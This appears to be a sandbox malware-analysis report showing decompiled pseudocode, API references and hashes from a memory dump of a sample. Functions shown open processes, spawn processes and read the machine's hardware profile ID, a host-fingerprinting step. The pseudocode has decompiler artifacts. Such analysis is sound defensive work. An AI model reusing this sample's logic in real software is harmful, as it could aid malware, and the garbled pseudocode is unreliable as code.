				char _v268;
				int* _v272;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				intOrPtr _t14;
				void* _t21;
				intOrPtr* _t23;
				void* _t29;
				void* _t30;
				int* _t31;
				signed int _t32;

				_t11 =  *0x43d054; // 0x8e1b5714
				_v8 = _t11 ^ _t32;
				_t31 = __ecx;
				_v272 = __ecx;
				_v272 = __ecx;
				_t30 = OpenProcess(0x410, 0, __edx);
				if(_t30 != 0) {
					__imp__K32GetModuleFileNameExA(_t30, 0,  &_v268, 0x104); // executed
					FindCloseChangeNotification(_t30); // executed
				}
				_t23 =  &_v268;
				 *_t31 = 0;
				_t31[4] = 0;
				_t29 = _t23 + 1;
				_t31[5] = 0xf;
				 *_t31 = 0;
				do {
					_t14 =  *_t23;
					_t23 = _t23 + 1;
				} while (_t14 != 0);
				E004026C0(_t21, _t31,  &_v268, _t23 - _t29);
				return E0040EB3F(_t31, _t21, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x00405429
0x00405430
0x00405436
0x0040543a
0x00405445
0x00405451
0x00405455
0x00405466
0x0040546d
0x0040546d
0x00405473
0x00405479
0x0040547f
0x00405486
0x00405489
0x00405490
0x00405493
0x00405493
0x00405495
0x00405496
0x004054a6
0x004054bc

APIs

OpenProcess.KERNEL32(00000410,00000000,?,00450D41,00000000), ref: 0040544B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,00450D41,00000000), ref: 00405466
FindCloseChangeNotification.KERNELBASE(00000000,?,00450D41,00000000), ref: 0040546D

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindModuleNameNotificationOpenProcess
String ID:
API String ID: 4186666201-0
Opcode ID: f6e5159dd284751ee93d037bf004092736d7d04415075a92785d478ddeb92642
Instruction ID: 829f4f66f58d42bfe2c112fba26a353ac732f0a9bd137df87df4f1daa9280949
Opcode Fuzzy Hash: f6e5159dd284751ee93d037bf004092736d7d04415075a92785d478ddeb92642
Instruction Fuzzy Hash: 541126306002189BD720DF25DC05BFBBBB4DB45700F0006AEE58597280DBF95A86CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004066A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
processCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004066A0(void* __ebx, CHAR* __ecx, void* __edi, struct _SECURITY_ATTRIBUTES** _a4, intOrPtr _a24) {
				signed int _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				signed int _v116;
				char _v132;
				struct tagHW_PROFILE_INFOA _v240;
				struct _SECURITY_ATTRIBUTES** _v244;
				void* __esi;
				void* __ebp;
				signed int _t28;
				struct _SECURITY_ATTRIBUTES** _t35;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				signed int _t49;
				struct _SECURITY_ATTRIBUTES** _t58;
				intOrPtr* _t63;
				intOrPtr _t70;
				void* _t73;
				signed int _t75;
				void* _t77;
				struct _SECURITY_ATTRIBUTES** _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;

				_t74 = __edi;
				_t54 = __ebx;
				_t28 =  *0x43d054; // 0x8e1b5714
				_v8 = _t28 ^ _t79;
				_v100.cb = 0x44;
				asm("xorps xmm0, xmm0");
				_t31 =  >=  ? _a4 :  &_a4;
				asm("movlpd [ebp-0x5c], xmm0");
				asm("movlpd [ebp-0x54], xmm0");
				asm("movlpd [ebp-0x4c], xmm0");
				asm("movlpd [ebp-0x44], xmm0");
				asm("movlpd [ebp-0x3c], xmm0");
				asm("movlpd [ebp-0x34], xmm0");
				asm("movlpd [ebp-0x2c], xmm0");
				asm("movlpd [ebp-0x24], xmm0");
				asm("movups [ebp-0x14], xmm0"); // executed
				CreateProcessA(__ecx,  >=  ? _a4 :  &_a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24); // executed
				_t70 = _a24;
				_t77 =  !=  ? _v24.dwProcessId : _t75 | 0xffffffff;
				if(_t70 < 0x10) {
					L4:
					return E0040EB3F(_t77, _t54, _v8 ^ _t79, _t70, _t74, _t77);
				} else {
					_t58 = _a4;
					_t70 = _t70 + 1;
					_t35 = _t58;
					if(_t70 < 0x1000) {
						L3:
						_push(_t70);
						E0040ED7F(_t58);
						goto L4;
					} else {
						_t58 =  *(_t58 - 4);
						_t70 = _t70 + 0x23;
						if(_t35 - _t58 + 0xfffffffc > 0x1f) {
							E004134A7(__ebx, _t70, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t79);
							_t80 = _t81;
							_t40 =  *0x43d054; // 0x8e1b5714
							_v116 = _t40 ^ _t80;
							_push(_t77);
							_t78 = _t58;
							_v244 = _t78;
							_v244 = _t78;
							_t43 = GetCurrentHwProfileA( &_v240); // executed
							__eflags = _t43;
							if(__eflags == 0) {
								_t44 = E00417D76(_t58, __eflags);
								asm("cdq");
								E004055C0(_t78, _t44 % 0xa + 5);
								__eflags = _v24.dwThreadId ^ _t80;
								return E0040EB3F(_t78, __ebx, _v24.dwThreadId ^ _t80, _t44 % 0xa + 5, __edi, _t78);
							} else {
								_t63 =  &_v132;
								 *_t78 = 0;
								_t78[4] = 0;
								_t73 = _t63 + 1;
								_t78[5] = 0xf;
								 *_t78 = 0;
								do {
									_t49 =  *_t63;
									_t63 = _t63 + 1;
									__eflags = _t49;
								} while (_t49 != 0);
								E004026C0(__ebx, _t78,  &_v132, _t63 - _t73);
								__eflags = _v24.dwThreadId ^ _t80;
								return E0040EB3F(_t78, __ebx, _v24.dwThreadId ^ _t80, _t73, __edi, _t78);
							}
						} else {
							goto L3;
						}
					}
				}
			}

0x004066a0
0x004066a0
0x004066a6
0x004066ad
0x004066bc
0x004066cc
0x004066d2
0x004066dc
0x004066e1
0x004066e6
0x004066eb
0x004066f0
0x004066f5
0x004066fa
0x004066ff
0x00406704
0x00406708
0x0040670e
0x00406716
0x0040671d
0x00406747
0x00406757
0x0040671f
0x0040671f
0x00406722
0x00406723
0x0040672b
0x0040673d
0x0040673d
0x0040673f
0x00000000
0x0040672d
0x0040672d
0x00406730
0x0040673b
0x00406758
0x0040675d
0x0040675e
0x0040675f
0x00406760
0x00406761
0x00406769
0x00406770
0x00406773
0x00406774
0x00406779
0x00406780
0x00406786
0x0040678c
0x0040678e
0x004067d6
0x004067db
0x004067e8
0x004067f2
0x004067fd
0x00406790
0x00406790
0x00406793
0x00406799
0x004067a0
0x004067a3
0x004067aa
0x004067b0
0x004067b0
0x004067b2
0x004067b3
0x004067b3
0x004067c0
0x004067cb
0x004067d5
0x004067d5
0x00000000
0x00000000
0x00000000
0x0040673b
0x0040672b

APIs

CreateProcessA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00406708

Strings

D, xrefs: 004066BC

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 56e7ec7c83a71b3177fb2ad6e4ebb4b6caa86bd31a1f3b5fe90937bfafde343f
Instruction ID: 30fa89b85bb580d64abfc6276995d55086d99e8358bcd070f94e939b3561ae1f
Opcode Fuzzy Hash: 56e7ec7c83a71b3177fb2ad6e4ebb4b6caa86bd31a1f3b5fe90937bfafde343f
Instruction Fuzzy Hash: BB21B331E1034CA7DB14DFA5CE457ADB7B2EB99704F109319F5157A184EB74AA808B84

Uniqueness

Uniqueness Score: -1.00%

Function 004285B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E004285B0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E00419CDB(_t25, _a12,  &_v28, E00423A98(__edx, __eflags)) == 0) {
					_push(_a28);
					_t22 = E0042863E(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t29 = _t22;
				} else {
					_t29 = _t28 | 0xffffffff;
				}
				if(_v8 != 0) {
					E0041E238(_v20);
				}
				return _t29;
			}

0x004285b0
0x004285bb
0x004285be
0x004285c1
0x004285c4
0x004285c7
0x004285ca
0x004285e4
0x004285eb
0x00428600
0x00428608
0x004285e6
0x004285e6
0x004285e6
0x0042860e
0x00428613
0x00428618
0x0042861d

APIs

_free.LIBCMT ref: 00428613

Strings

xA, xrefs: 004285B2

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID: xA
API String ID: 269201875-523113891
Opcode ID: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction ID: abadc60d9d5482227ee59285e73ab8488396fa896db33f31679a295bd9fdab7c
Opcode Fuzzy Hash: 521115d978e45e608ea96acc4bbcbcaa1d0163517ca36d6091db2ee742d9455d
Instruction Fuzzy Hash: C2017172D01119BFCF01AFA8DC019DE7FB5BB08314F54016AF914A2191E6358A60DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A59D Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041A59D(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x450898 == 0) {
					_push(_t13);
					E00424803(__ebx);
					_t2 = E00424B10(__ecx);
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E0041A5F0(__ebx, _t17); // executed
						if(_t3 != 0) {
							 *0x4508a4 = _t3;
							_t14 = 0;
							 *0x450898 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E0041E238(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E0041E238(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x0041a5a4
0x0041a5aa
0x0041a5ab
0x0041a5b0
0x0041a5b5
0x0041a5b9
0x0041a5c1
0x0041a5c9
0x0041a5d0
0x0041a5d5
0x0041a5d7
0x0041a5cb
0x0041a5cb
0x0041a5cb
0x0041a5de
0x0041a5bb
0x0041a5bb
0x0041a5bb
0x0041a5e5
0x0041a5ef
0x0041a5a6
0x0041a5a8
0x0041a5a8

APIs

_free.LIBCMT ref: 0041A5E5

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction ID: 72dc59d1b82574442c98349f250d0c3c419e23079047cae4ade360bd4076de00
Opcode Fuzzy Hash: 526f0598ed6c5c09f80c27bed797f3bdec909cf5737d209df5188b07db91258f
Instruction Fuzzy Hash: 42E06C3660F51165E255373BBC017E7159A8BC1375F25032BF414871D5EE7C84D254AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDD0 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040CDD0(void* __ebx, signed int* __ecx, void* __edi, signed int __esi, char _a4, signed int _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v104;
				intOrPtr _t185;
				signed int _t189;
				signed int _t192;
				intOrPtr _t202;
				void* _t213;
				intOrPtr _t214;
				void* _t217;
				char _t218;
				void* _t221;
				unsigned int _t225;
				void* _t226;
				signed int _t237;
				signed int _t239;
				void* _t245;
				signed int _t247;
				signed int _t250;
				signed int _t252;
				signed int _t265;
				signed int _t266;
				signed int _t274;
				signed int _t275;
				signed int _t291;
				void* _t292;
				signed int _t293;
				unsigned int* _t295;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t301;
				unsigned int _t303;
				unsigned int _t305;
				unsigned int _t307;
				signed int _t310;
				unsigned int _t315;
				intOrPtr _t317;
				char* _t318;
				intOrPtr _t319;
				signed int* _t320;
				signed int _t321;
				void* _t328;
				signed int _t335;
				signed int _t339;
				signed int _t345;
				signed int _t351;
				unsigned int _t353;
				signed int _t361;
				signed int _t370;
				intOrPtr _t371;
				char _t372;
				signed int* _t373;
				signed int* _t374;
				signed int _t392;
				signed int* _t393;
				signed int _t394;
				intOrPtr _t396;
				signed int _t399;
				signed int _t401;
				signed int _t406;
				signed int _t407;
				char* _t409;
				void* _t419;
				signed int _t420;
				signed int _t421;
				void* _t422;
				void* _t430;
				signed int _t431;
				signed int _t432;
				void* _t433;
				void* _t438;
				void* _t441;

				_t406 = __esi;
				_t419 = _t430;
				_t431 = _t430 - 0x14;
				_v20 = _a8;
				_push(__ebx);
				_t295 = __ecx;
				_t307 = _a4;
				_push(__esi);
				_v12 = _t307;
				_push(__edi);
				_t392 =  *__ecx;
				_t310 = __ecx[1] - _t392;
				_v16 = __ecx;
				_v8 = (0x2aaaaaab * (_t307 - _t392) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t307 - _t392) >> 0x20 >> 2);
				_t365 = 0x2aaaaaab * _t310 >> 0x20 >> 2;
				_t185 = (0x2aaaaaab * _t310 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t310 >> 0x20 >> 2);
				_v24 = _t185;
				if(_t185 == 0xaaaaaaa) {
					L19:
					E0040D3F0(_t310, _t406);
					goto L20;
				} else {
					_t406 = _t185 + 1;
					_t310 = (0x2aaaaaab * (__ecx[2] - _t392) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (__ecx[2] - _t392) >> 0x20 >> 2);
					_t365 = _t310 >> 1;
					if(_t310 > 0xaaaaaaa - _t365) {
						L18:
						E004018C0();
						goto L19;
					} else {
						_t310 =  >=  ? _t365 + _t310 : _t406;
						if(_t310 > 0xaaaaaaa) {
							goto L18;
						} else {
							_t392 = _t310 + _t310 * 2 << 3;
							if(_t392 < 0x1000) {
								__eflags = _t392;
								if(__eflags == 0) {
									_t406 = 0;
									__eflags = 0;
								} else {
									_t291 = E0040ED4F(__ecx, _t392, _t406, __eflags, _t392); // executed
									_t431 = _t431 + 4;
									_t406 = _t291;
								}
								goto L10;
							} else {
								_t26 = _t392 + 0x23; // 0x23
								_t292 = _t26;
								_t449 = _t292 - _t392;
								if(_t292 <= _t392) {
									goto L18;
								} else {
									_t293 = E0040ED4F(__ecx, _t392, _t406, _t449, _t292);
									_t431 = _t431 + 4;
									if(_t293 == 0) {
										L20:
										E004134A7(_t295, _t365, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t419);
										_t420 = _t431;
										_push(0xffffffff);
										_push(0x42cc50);
										_push( *[fs:0x0]);
										_t432 = _t431 - 0x24;
										_push(_t295);
										_push(_t406);
										_push(_t392);
										_t189 =  *0x43d054; // 0x8e1b5714
										_push(_t189 ^ _t420);
										 *[fs:0x0] =  &_v48;
										_v52 = _t432;
										_t393 = _t310;
										_t192 = _v28;
										_t296 =  *_t393;
										_v68 = _t192;
										_v72 = _v24;
										_t315 = _t393[1] - _t296;
										_v64 = (0x2aaaaaab * (_t192 - _t296) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t192 - _t296) >> 0x20 >> 2);
										_t369 = 0x2aaaaaab * _t315 >> 0x20 >> 2;
										_t202 = (0x2aaaaaab * _t315 >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * _t315 >> 0x20 >> 2);
										_v76 = _t202;
										__eflags = _t202 - 0xaaaaaaa;
										if(_t202 == 0xaaaaaaa) {
											L41:
											E0040D3F0(_t315, _t406);
											goto L42;
										} else {
											_t406 = _t202 + 1;
											_t315 = (0x2aaaaaab * (_t393[2] - _t296) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t393[2] - _t296) >> 0x20 >> 2);
											_t369 = _t315 >> 1;
											__eflags = _t315 - 0xaaaaaaa - _t369;
											if(_t315 > 0xaaaaaaa - _t369) {
												L40:
												E004018C0();
												goto L41;
											} else {
												_t245 = _t369 + _t315;
												__eflags = _t245 - _t406;
												_t296 =  >=  ? _t245 : _t406;
												__eflags = _t296 - 0xaaaaaaa;
												if(_t296 > 0xaaaaaaa) {
													goto L40;
												} else {
													_v28 = _t296;
													_t247 = _t296 + _t296 * 2 << 3;
													_v52 = _t247;
													__eflags = _t247 - 0x1000;
													if(_t247 < 0x1000) {
														__eflags = _t247;
														if(__eflags == 0) {
															_t406 = 0;
															__eflags = 0;
														} else {
															_t265 = E0040ED4F(_t296, _t393, _t406, __eflags, _t247);
															_t432 = _t432 + 4;
															_t406 = _t265;
														}
														_v28 = _t296;
														goto L32;
													} else {
														_t96 = _t247 + 0x23; // 0xaaaaacd
														_t315 = _t96;
														__eflags = _t315 - _t247;
														if(__eflags <= 0) {
															goto L40;
														} else {
															_t266 = E0040ED4F(_t296, _t393, _t406, __eflags, _t315);
															_t432 = _t432 + 4;
															__eflags = _t266;
															if(__eflags == 0) {
																L42:
																E004134A7(_t296, _t369, __eflags);
																E0040C4B0(_t315, _v56, _v56);
																E0040C4D0(_t296, _v32, _v28);
																E004103CB(0, 0);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t420);
																_t421 = _t432;
																_t433 = _t432 - 8;
																_push(_t296);
																_t297 = _t315;
																_t316 = 0x7fffffff;
																_push(_t406);
																_push(_t393);
																_t370 = _t297[4];
																_v104 = _t370;
																__eflags = 0x7fffffff - _t370 - 1;
																if(0x7fffffff - _t370 < 1) {
																	E00401960(_t297, 0x7fffffff, _t393);
																	goto L63;
																} else {
																	_t406 = _t297[5];
																	_t399 = _t370 + 0x00000001 | 0x0000000f;
																	_v20 = _t406;
																	__eflags = _t399 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t225 = _t406 >> 1;
																		__eflags = _t406 - 0x7fffffff - _t225;
																		if(__eflags <= 0) {
																			_t226 = _t225 + _t406;
																			__eflags = _t399 - _t226;
																			_t393 =  <  ? _t226 : _t399;
																		} else {
																			_t393 = 0x7fffffff;
																		}
																	} else {
																		_t393 = 0x7fffffff;
																	}
																	_t316 =  ~(0 | __eflags > 0x00000000) |  &(_t393[0]);
																	__eflags = _t316 - 0x1000;
																	if(_t316 < 0x1000) {
																		__eflags = _t316;
																		if(__eflags == 0) {
																			_t406 = 0;
																			__eflags = 0;
																		} else {
																			_t237 = E0040ED4F(_t297, _t393, _t406, __eflags, _t316);
																			_t370 = _v16;
																			_t433 = _t433 + 4;
																			_t406 = _t237;
																		}
																		goto L56;
																	} else {
																		_t145 = _t316 + 0x23; // 0x23
																		_t238 = _t145;
																		__eflags = _t145 - _t316;
																		if(__eflags <= 0) {
																			L63:
																			E004018C0();
																			goto L64;
																		} else {
																			_t239 = E0040ED4F(_t297, _t393, _t406, __eflags, _t238);
																			_t433 = _t433 + 4;
																			__eflags = _t239;
																			if(__eflags == 0) {
																				L64:
																				_t213 = E004134A7(_t297, _t370, __eflags);
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				_push(_t421);
																				_t422 = _t433;
																				_push(_t406);
																				_push(_t393);
																				_t394 = _t370;
																				_t407 = _t316;
																				__eflags = _t407 - _t394;
																				if(_t407 == _t394) {
																					L73:
																					return _t213;
																				} else {
																					do {
																						_t317 =  *((intOrPtr*)(_t407 + 0x14));
																						__eflags = _t317 - 0x10;
																						if(_t317 < 0x10) {
																							goto L72;
																						} else {
																							_t214 =  *_t407;
																							_t318 = _t317 + 1;
																							__eflags = _t318 - 0x1000;
																							if(_t318 < 0x1000) {
																								L71:
																								_push(_t318);
																								_t213 = E0040ED7F(_t214);
																								_t433 = _t433 + 8;
																								goto L72;
																							} else {
																								_t371 =  *((intOrPtr*)(_t214 - 4));
																								_t318 = _t318 + 0x23;
																								__eflags = _t214 - _t371 + 0xfffffffc - 0x1f;
																								if(__eflags > 0) {
																									_t217 = E004134A7(_t297, _t371, __eflags);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_push(_t422);
																									_push(_t407);
																									_push(_t394);
																									_t396 = _t371;
																									_t409 = _t318;
																									__eflags = _t409 - _t396;
																									if(_t409 == _t396) {
																										L83:
																										return _t217;
																									} else {
																										do {
																											_t319 =  *((intOrPtr*)(_t409 + 0x14));
																											__eflags = _t319 - 0x10;
																											if(_t319 < 0x10) {
																												goto L82;
																											} else {
																												_t218 =  *_t409;
																												_t320 = _t319 + 1;
																												__eflags = _t320 - 0x1000;
																												if(_t320 < 0x1000) {
																													L81:
																													_push(_t320);
																													_t217 = E0040ED7F(_t218);
																													_t433 = _t433 + 8;
																													goto L82;
																												} else {
																													_t372 =  *((intOrPtr*)(_t218 - 4));
																													_t320 =  &(_t320[8]);
																													__eflags = _t218 - _t372 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														_t221 = E004134A7(_t297, _t372, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_t321 =  *_t320;
																														__eflags = _t321;
																														if(_t321 != 0) {
																															return  *((intOrPtr*)( *_t321))(1);
																														}
																														return _t221;
																													} else {
																														_t218 = _t372;
																														goto L81;
																													}
																												}
																											}
																											goto L88;
																											L82:
																											 *((intOrPtr*)(_t409 + 0x10)) = 0;
																											 *((intOrPtr*)(_t409 + 0x14)) = 0xf;
																											 *_t409 = 0;
																											_t409 = _t409 + 0x18;
																											__eflags = _t409 - _t396;
																										} while (_t409 != _t396);
																										goto L83;
																									}
																								} else {
																									_t214 = _t371;
																									goto L71;
																								}
																							}
																						}
																						goto L88;
																						L72:
																						 *((intOrPtr*)(_t407 + 0x10)) = 0;
																						 *((intOrPtr*)(_t407 + 0x14)) = 0xf;
																						 *_t407 = 0;
																						_t407 = _t407 + 0x1c;
																						__eflags = _t407 - _t394;
																					} while (_t407 != _t394);
																					goto L73;
																				}
																			} else {
																				_t370 = _v16;
																				_t147 = _t239 + 0x23; // 0x23
																				_t406 = _t147 & 0xffffffe0;
																				 *(_t406 - 4) = _t239;
																				L56:
																				__eflags = _v20 - 0x10;
																				_t297[4] = _t370 + 1;
																				_t297[5] = _t393;
																				_push(_t370);
																				if(_v20 < 0x10) {
																					_push(_t297);
																					_push(_t406);
																					E00410440();
																					_t373 = _v16;
																					 *((char*)(_t406 + _t373)) = _a4;
																					 *((char*)(_t406 + _t373 + 1)) = 0;
																					 *_t297 = _t406;
																					return _t297;
																				} else {
																					_t401 =  *_t297;
																					_push(_t401);
																					_push(_t406);
																					E00410440();
																					_t374 = _v16;
																					_t433 = _t433 + 0xc;
																					_t328 = _v20 + 1;
																					 *((char*)(_t406 + _t374)) = _a4;
																					 *((char*)(_t406 + _t374 + 1)) = 0;
																					__eflags = _t328 - 0x1000;
																					if(_t328 < 0x1000) {
																						L60:
																						_push(_t328);
																						E0040ED7F(_t401);
																						 *_t297 = _t406;
																						return _t297;
																					} else {
																						_t370 =  *(_t401 - 4);
																						_t316 = _t328 + 0x23;
																						_t393 = _t401 - _t370;
																						__eflags = _t393 - 4 - 0x1f;
																						if(__eflags > 0) {
																							goto L64;
																						} else {
																							_t401 = _t370;
																							goto L60;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t97 = _t266 + 0x23; // 0x23
																_t406 = _t97 & 0xffffffe0;
																 *(_t406 - 4) = _t266;
																L32:
																_v32 = _t406;
																_v12 = 0;
																_t250 = _t406 + (_v36 + _v36 * 2) * 8;
																_t301 = _t250 + 0x18;
																_v36 = _t250;
																_v56 = _t301;
																E0040BB10(_t301, _t250, _t369, _t393, _v44);
																_t334 =  *_t393;
																_t378 = _t393[1];
																_t252 = _v40;
																_push( *_t393);
																_push(_t406);
																__eflags = _t252 - _t393[1];
																if(_t252 != _t393[1]) {
																	E0040D980(_t334, _t252);
																	_t378 = _t393[1];
																	_t432 = _t432 + 4;
																	_t334 = _v40;
																	_push(_t301);
																}
																E0040D980(_t334, _t378);
																_t335 =  *_t393;
																_t438 = _t432 + 8;
																__eflags = _t335;
																if(_t335 == 0) {
																	L39:
																	 *_t393 = _t406;
																	_t393[1] = _t406 + (_v48 + 1 + (_v48 + 1) * 2) * 8;
																	_t339 = _v52 + _t406;
																	__eflags = _t339;
																	_t393[2] = _t339;
																	 *[fs:0x0] = _v20;
																	return _v36;
																} else {
																	_push(_t335);
																	L75();
																	_t303 =  *_t393;
																	_t432 = _t438 + 4;
																	_t345 = (0x2aaaaaab * (_t393[2] - _t303) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t393[2] - _t303) >> 0x20 >> 2) + ((0x2aaaaaab * (_t393[2] - _t303) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t393[2] - _t303) >> 0x20 >> 2)) * 2 << 3;
																	__eflags = _t345 - 0x1000;
																	if(_t345 < 0x1000) {
																		L38:
																		_push(_t345);
																		E0040ED7F(_t303);
																		goto L39;
																	} else {
																		_t369 =  *(_t303 - 4);
																		_t315 = _t345 + 0x23;
																		_t296 = _t303 - _t369;
																		__eflags = _t296 - 4 - 0x1f;
																		if(__eflags > 0) {
																			goto L42;
																		} else {
																			_t303 = _t369;
																			goto L38;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t27 = _t293 + 0x23; // 0x23
										_t406 = _t27 & 0xffffffe0;
										 *(_t406 - 4) = _t293;
										L10:
										_t351 = _v20;
										_t274 = _v8 + _v8 * 2;
										 *((intOrPtr*)(_t406 + _t274 * 8)) = 0;
										_t275 = _t406 + _t274 * 8;
										 *((intOrPtr*)(_t275 + 0x10)) = 0;
										 *((intOrPtr*)(_t275 + 0x14)) = 0;
										asm("movups xmm0, [ecx]");
										_v8 = _t275;
										asm("movups [eax], xmm0");
										asm("movq xmm0, [ecx+0x10]");
										asm("movq [eax+0x10], xmm0");
										_t276 = _v12;
										 *((intOrPtr*)(_t351 + 0x10)) = 0;
										 *((intOrPtr*)(_t351 + 0x14)) = 0xf;
										 *_t351 = 0;
										_t352 =  *_t295;
										_t386 = _t295[1];
										_push( *_t295);
										_push(_t406);
										if(_v12 != _t295[1]) {
											E0040D980(_t352, _t276);
											_t431 = _t431 + 4;
											_t386 = _t295[1];
											_t352 = _v12;
											_push(_v8 + 0x18);
										}
										E0040D980(_t352, _t386);
										_t353 =  *_t295;
										_t441 = _t431 + 8;
										if(_t353 == 0) {
											L17:
											 *_t295 = _t406;
											_t295[1] = _t406 + (_v24 + 1 + (_v24 + 1) * 2) * 8;
											_t295[2] = _t392 + _t406;
											return _v8;
										} else {
											_push(_t353);
											L75();
											_t305 =  *_t295;
											_t431 = _t441 + 4;
											_t361 = (0x2aaaaaab * (_v16[2] - _t305) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v16[2] - _t305) >> 0x20 >> 2) + ((0x2aaaaaab * (_v16[2] - _t305) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v16[2] - _t305) >> 0x20 >> 2)) * 2 << 3;
											if(_t361 < 0x1000) {
												L16:
												_push(_t361);
												E0040ED7F(_t305);
												_t295 = _v16;
												goto L17;
											} else {
												_t365 =  *(_t305 - 4);
												_t310 = _t361 + 0x23;
												_t295 = _t305 - _t365;
												if(_t295 - 4 > 0x1f) {
													goto L20;
												} else {
													_t305 = _t365;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L88:
			}

0x0040cdd0
0x0040cdd1
0x0040cdd3
0x0040cdd9
0x0040cde1
0x0040cde2
0x0040cde4
0x0040cde7
0x0040cde8
0x0040cdeb
0x0040cdec
0x0040cdf8
0x0040cdfc
0x0040ce04
0x0040ce0e
